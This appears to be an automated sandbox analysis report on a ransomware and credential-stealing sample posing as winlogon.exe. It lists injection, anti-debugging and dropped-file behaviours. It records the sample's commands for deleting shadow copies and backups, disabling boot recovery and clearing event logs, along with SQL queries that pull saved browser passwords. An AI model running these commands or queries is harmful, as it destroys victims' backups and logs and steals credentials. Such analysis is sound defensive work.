Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: winlogon.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
PE file contains a debug data directoryShow sources
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Binary contains paths to debug symbolsShow sources
Source: Binary string: KERBEROS.pdb source: ucngw.exe
Source: Binary string: msv1_0.pdb source: ucngw.exe
Source: Binary string: lsasrv.pdb source: ucngw.exe
PE file contains a valid data directory to section mappingShow sources
Source: winlogon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: winlogon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: winlogon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: winlogon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: winlogon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Binary contains device paths (device paths are often used for kernel mode <-> user mode communication)Show sources
Source: _wjg.exe.1.drBinary string: Sysinternals RocksRtlNtStatusToDosErrorntdll.dllRtlInitUnicodeStringNtOpenFileNtFsControlFile\Device\Srv2\Device\LanmanServerSeTcbPrivilege"%s" %sNetIsServiceAccountnetapi32.dll_SA_{262E99C9-6160-4871-ACEC-4E61736B6F21}NT AUTHORITYNT SERVICECreateRestrictedTokenwinsta0Winlogondefaultwinsta0\winlogonwinsta0\defaultWow64DisableWow64FsRedirectionKernel32.dll%s.exefailed to readsecure: %d
Source: _wjg.exe.1.drBinary string: Sysinternals RocksRtlNtStatusToDosErrorntdll.dllRtlInitUnicodeStringNtOpenFileNtFsControlFile\Device\LanmanRedirector\%s\ipc$Use PsKill to terminate the remotely running program.
Classification labelShow sources
Source: classification engineClassification label: mal100.evad.spre.rans.spyw.troj.winEXE@34/9@31/10
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D62B90 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetTokenInformation,LookupPrivilegeNameW,AdjustTokenPrivileges,CloseHandle,1_2_00D62B90
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_013335E0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetTokenInformation,LookupPrivilegeNameW,AdjustTokenPrivileges,CloseHandle,2_2_013335E0
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C61A30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetTokenInformation,LookupPrivilegeNameW,AdjustTokenPrivileges,CloseHandle,3_2_00C61A30
Source: C:\Users\user\AppData\Local\Temp\_usm.exeCode function: 4_2_001416E9 Wow64DisableWow64FsRedirection,LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,Wow64RevertWow64FsRedirection,CreateThread,Sleep,InitiateSystemShutdownExW,ExitProcess,4_2_001416E9
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D64C30 CoInitializeEx,CoInitializeSecurity,CredUIParseUserNameW,LocalAlloc,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysStringLen,SysStringLen,SysStringLen,SysStringLen,CoCreateInstance,SysFreeString,wsprintfW,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoSetProxyBlanket,CoSetProxyBlanket,SysAllocString,SysAllocString,SysFreeString,VariantClear,SysAllocString,SysAllocString,GetModuleFileNameW,CreateFileW,GetFileSize,SafeArrayCreate,SafeArrayAccessData,ReadFile,SafeArrayUnaccessData,CloseHandle,CloseHandle,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,LocalFree,CoUninitialize,1_2_00D64C30
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D6AAD0 GetModuleHandleW,FindResourceW,LoadResource,LockResource,SizeofResource,1_2_00D6AAD0
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\Users\user\AppData\Local\Temp\_usm.exeCode function: 4_2_001412E8 OpenSCManagerW,EnumServicesStatusW,EnumServicesStatusW,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusW,QueryServiceConfigW,OpenServiceW,QueryServiceConfigW,GetProcessHeap,HeapAlloc,ChangeServiceConfigW,QueryServiceConfigW,PathRemoveArgsW,GetProcessHeap,HeapFree,GetLastError,CloseServiceHandle,GetProcessHeap,HeapFree,CloseServiceHandle,4_2_001412E8
Creates files inside the user directoryShow sources
Source: C:\Users\user\Desktop\winlogon.exeFile created: C:\Users\Public\A9E5CC701A2E98F9114060D6645A7A5B
Creates temporary filesShow sources
Source: C:\Users\user\Desktop\winlogon.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\yegus.exe
Might use command line argumentsShow sources
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCommand line argument: <NULL>2_2_013338C0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCommand line argument: <NULL>2_2_013338C0
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCommand line argument: <NULL>3_2_00C61EC0
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCommand line argument: <NULL>3_2_00C61EC0
Source: C:\Users\user\AppData\Local\Temp\_usm.exeCommand line argument: wbadmin.exe4_2_001416E9
Source: C:\Users\user\AppData\Local\Temp\_usm.exeCommand line argument: bcdedit.exe4_2_001416E9
Source: C:\Users\user\AppData\Local\Temp\_usm.exeCommand line argument: wevtutil.exe4_2_001416E9
PE file has an executable .text section and no other executable sectionShow sources
Source: winlogon.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini filesShow sources
Source: C:\Users\user\AppData\Local\Temp\yegus.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Reads software policiesShow sources
Source: C:\Users\user\Desktop\winlogon.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
SQL strings found in memory and binary dataShow sources
Source: yegus.exeBinary or memory string: SELECT origin_url, username_value, password_value FROM logins;`R
Source: yegus.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: yegus.exeBinary or memory string: SELECT origin_url, username_value, password_value FROM logins;
Source: yegus.exeBinary or memory string: SELECT formSubmitURL, encryptedUsername, encryptedPassword FROM moz_logins;
Source: yegus.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: yegus.exeBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: yegus.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Sample is known by Antivirus (Virustotal or Metascan)Show sources
Source: winlogon.exeVirustotal: hash found
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\winlogon.exe 'C:\Users\user\Desktop\winlogon.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\yegus.exe 123 \\.\pipe\122B85FE-84BD-45AB-AEE5-28D37FB4C464
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ucngw.exe 123 \\.\pipe\33F83B68-FC3D-4C1F-B4AE-1329770D367B
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\_usm.exe C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: unknownProcess created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
Source: unknownProcess created: C:\Windows\System32\wbadmin.exe wbadmin.exe delete catalog -quiet
Source: unknownProcess created: C:\Windows\System32\wbengine.exe C:\Windows\system32\wbengine.exe
Source: unknownProcess created: C:\Windows\System32\vdsldr.exe C:\Windows\System32\vdsldr.exe -Embedding
Source: unknownProcess created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil.exe cl System
Source: unknownProcess created: C:\Windows\System32\wevtutil.exe wevtutil.exe cl System
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
Source: unknownProcess created: C:\Windows\System32\wevtutil.exe wevtutil.exe cl Security
Source: unknownProcess created: C:\Windows\System32\LogonUI.exe 'LogonUI.exe' /flags:0x0
Source: unknownProcess created: C:\Windows\System32\LogonUI.exe unknown
Source: C:\Users\user\Desktop\winlogon.exeProcess created: C:\Users\user\AppData\Local\Temp\yegus.exe 123 \\.\pipe\122B85FE-84BD-45AB-AEE5-28D37FB4C464
Source: C:\Users\user\Desktop\winlogon.exeProcess created: C:\Users\user\AppData\Local\Temp\ucngw.exe 123 \\.\pipe\33F83B68-FC3D-4C1F-B4AE-1329770D367B
Source: C:\Users\user\Desktop\winlogon.exeProcess created: C:\Users\user\AppData\Local\Temp\_usm.exe C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe
Source: C:\Users\user\AppData\Local\Temp\_usm.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: C:\Users\user\AppData\Local\Temp\_usm.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
Source: C:\Users\user\AppData\Local\Temp\_usm.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
Source: C:\Users\user\AppData\Local\Temp\_usm.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil.exe cl System
Source: C:\Users\user\AppData\Local\Temp\_usm.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin.exe delete catalog -quiet
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil.exe cl System
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil.exe cl Security
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\winlogon.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)Show sources
Source: winlogon.exeStatic PE information: Section: .rsrc ZLIB complexity 1.00009145872
Source: yegus.exe.1.drStatic PE information: Section: .rsrc ZLIB complexity 0.999364306084
Source: ucngw.exe.1.drStatic PE information: Section: .rsrc ZLIB complexity 0.995655293367
Source: _yig.exe.1.drStatic PE information: Section: .rsrc ZLIB complexity 1.00009145872
Contains functionality to call native functionsShow sources
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_100147C0 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,LocalFree,3_2_100147C0
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_10013CB0 LoadLibraryW,GetModuleHandleW,NtQueryInformationProcess,3_2_10013CB0
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_100145E0 GetCurrentProcess,NtQueryInformationProcess,RtlGetCurrentPeb,3_2_100145E0
Creates files inside the system directoryShow sources
Source: C:\Windows\System32\wbadmin.exeFile created: C:\Windows\Logs\WindowsBackup
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D7989E1_2_00D7989E
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D793F01_2_00D793F0
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D6F6CE1_2_00D6F6CE
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D7CF3F1_2_00D7CF3F
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D611101_2_00D61110
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D693301_2_00D69330
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D618701_2_00D61870
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D68EE01_2_00D68EE0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_013313702_2_01331370
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_0133E8FF2_2_0133E8FF
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_013315E02_2_013315E0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_013310A02_2_013310A0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_01332B702_2_01332B70
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_013332D02_2_013332D0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100641402_2_10064140
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100196A02_2_100196A0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100291302_2_10029130
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_1003C8802_2_1003C880
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10053C802_2_10053C80
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100658702_2_10065870
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100804F02_2_100804F0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100270502_2_10027050
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100060222_2_10006022
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100078702_2_10007870
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10005C302_2_10005C30
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_1006F8102_2_1006F810
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10036CD02_2_10036CD0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_1003B6A02_2_1003B6A0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10008D502_2_10008D50
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100794592_2_10079459
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10022AD02_2_10022AD0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100780602_2_10078060
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100170502_2_10017050
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100022002_2_10002200
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_1002DD282_2_1002DD28
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100747802_2_10074780
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10021F802_2_10021F80
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_1001EBB02_2_1001EBB0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_1001CFF02_2_1001CFF0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_1008DE012_2_1008DE01
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100722E02_2_100722E0
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C5FC903_2_00C5FC90
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C60F403_2_00C60F40
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C5D39F3_2_00C5D39F
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C5FD203_2_00C5FD20
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C611503_2_00C61150
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C5F3F03_2_00C5F3F0
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C5F6A03_2_00C5F6A0
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_100049503_2_10004950
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_100039B33_2_100039B3
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_1000F8983_2_1000F898
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_10003C103_2_10003C10
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_1000B61E3_2_1000B61E
Enables security privilegesShow sources
Source: C:\Users\user\Desktop\winlogon.exeProcess token adjusted: Security
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: String function: 00D6B650 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: String function: 100071E0 appears 59 times
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: String function: 10024C30 appears 105 times
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: String function: 10007480 appears 193 times
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: String function: 10008070 appears 167 times
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: String function: 00C51CA0 appears 32 times
PE file contains executable resources (Code or Archives)Show sources
Source: _wjg.exe.1.drStatic PE information: Resource name: BINRES type: PE32 executable (console) Intel 80386, for MS Windows
Reads the hosts fileShow sources
Source: C:\Users\user\Desktop\winlogon.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\winlogon.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\winlogon.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\winlogon.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\winlogon.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\winlogon.exeFile read: C:\Windows\System32\drivers\etc\hosts
Sample file is different than original file name gathered from version infoShow sources
Source: winlogon.exeBinary or memory string: OriginalFilenamepsexec.cH vs winlogon.exe
Source: winlogon.exeBinary or memory string: OriginalFilenamepsexesvc.exeH vs winlogon.exe
Sample reads its own file contentShow sources
Source: C:\Users\user\Desktop\winlogon.exeFile read: C:\Users\user\Desktop\winlogon.exe
Tries to load missing DLLsShow sources
Source: C:\Users\user\AppData\Local\Temp\yegus.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll

HIPS / PFW / Operating System Protection Evasion:

barindex
Contains functionality to execute programs as a different userShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D63920 LogonUserA,GetLastError,DeleteCriticalSection,1_2_00D63920
Contains functionality to inject code into remote processesShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D65DD0 ExitProcess,Sleep,DeleteFileW,GetFileSize,WriteFile,GetFileAttributesW,CreateFileW,CloseHandle,GetModuleHandleW,GetModuleFileNameW,GetWindowsDirectoryW,CreateProcessW,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,TerminateProcess,CloseHandle,1_2_00D65DD0
Contains functionality to inject threads in other processesShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D65DD0 ExitProcess,Sleep,DeleteFileW,GetFileSize,WriteFile,GetFileAttributesW,CreateFileW,CloseHandle,GetModuleHandleW,GetModuleFileNameW,GetWindowsDirectoryW,CreateProcessW,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,TerminateProcess,CloseHandle,1_2_00D65DD0

Anti Debugging:

barindex
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D6B598 SetUnhandledExceptionFilter,1_2_00D6B598
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D6AE70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00D6AE70
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D6B406 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00D6B406
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D7009F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00D7009F
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_013347F1 SetUnhandledExceptionFilter,2_2_013347F1
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_013346A3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_013346A3
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_013340FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_013340FB
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_013372DB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_013372DB
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100827CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_100827CB
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_1008657C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_1008657C
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10083265 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_10083265
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C51BE9 SetUnhandledExceptionFilter,3_2_00C51BE9
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C54CBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00C54CBD
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C514CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00C514CB
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C51A54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00C51A54
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_10001795 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_10001795
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_1000662D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_1000662D
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_10001B37 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_10001B37
Source: C:\Users\user\AppData\Local\Temp\_usm.exeCode function: 4_2_001417EA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_001417EA
Source: C:\Users\user\AppData\Local\Temp\_usm.exeCode function: 4_2_0014333B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0014333B
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Users\user\Desktop\winlogon.exeSystem information queried: KernelDebuggerInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D6B406 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00D6B406
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D643A0 GetVersionExW,LoadLibraryW,GetProcAddress,SHGetKnownFolderPath,1_2_00D643A0
Contains functionality to read the PEBShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D70D28 mov eax, dword ptr fs:[00000030h]1_2_00D70D28
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_01337F59 mov eax, dword ptr fs:[00000030h]2_2_01337F59
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10085756 mov eax, dword ptr fs:[00000030h]2_2_10085756
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C558EB mov eax, dword ptr fs:[00000030h]3_2_00C558EB
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_100051BB mov eax, dword ptr fs:[00000030h]3_2_100051BB
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D6A6F0 GetProcessHeap,RtlAllocateHeap,1_2_00D6A6F0
Enables debug privilegesShow sources
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeProcess token adjusted: Debug

Malware Analysis System Evasion:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D75F8F FindFirstFileExW,1_2_00D75F8F
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_01339A82 FindFirstFileExW,2_2_01339A82
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10088620 FindFirstFileExA,2_2_10088620
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C5850A FindFirstFileExW,3_2_00C5850A
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_10008EEC FindFirstFileExA,3_2_10008EEC
Source: C:\Users\user\AppData\Local\Temp\_usm.exeCode function: 4_2_00141441 wsprintfW,FindFirstFileW,GetProcessHeap,PathAppendW,GetProcessHeap,HeapAlloc,PathAppendW,PathAppendW,StrCmpCW,StrCmpCW,StrCmpCW,CreateFileW,GetFileSizeEx,CloseHandle,GetProcessHeap,HeapFree,FindNextFileW,FindClose,4_2_00141441
Contains functionality to query system informationShow sources
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_1000D3F0 GetSystemInfo,2_2_1000D3F0
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: wbadmin.exeBinary or memory string: Cluster service, and Hyper-V for more information.
Source: wbadmin.exeBinary or memory string: An error occurred while preparing to back up Hyper-V data.
Program exit pointsShow sources
Source: C:\Users\user\AppData\Local\Temp\_usm.exeAPI call chain: ExitProcess graph end node
Queries a list of all running processesShow sources
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeProcess information queried: ProcessInformation
Contains functionality to enumerate running servicesShow sources
